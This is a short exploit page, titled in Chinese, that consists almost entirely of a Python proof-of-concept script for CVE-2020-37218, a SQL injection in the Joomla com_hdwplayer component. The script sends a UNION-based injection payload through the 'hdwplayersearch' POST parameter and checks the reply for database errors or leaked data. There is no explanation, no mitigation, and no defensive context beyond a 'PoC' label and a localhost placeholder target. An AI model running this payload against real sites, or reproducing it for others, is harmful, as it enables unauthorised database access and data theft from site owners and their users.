CVE-2020-37218 Joomla组件SQL注入漏洞

import requests def exploit_cve_2020_37218(target_url): """ PoC for CVE-2020-37218 (Joomla com_hdwplayer SQL Injection) """ # The vulnerable parameter is 'hdwplayersearch' via POST request # The endpoint is typically /index.php?option=com_hdwplayer&view=search url = f"{target_url}/index.php?option=com_hdwplayer&view=search" # Malicious payload to test SQL injection # Attempting a basic UNION based injection to extract data payload_data = { "hdwplayersearch": "' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- -" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(url, data=payload_data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the response content for database errors or leaked data.") # Analyze response for SQL syntax errors or data leakage if "syntax error" in response.text.lower() or "mysql" in response.text.lower(): print("[!] Potential SQL vulnerability detected via error message.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://127.0.0.1" # Replace with the actual target URL exploit_cve_2020_37218(target)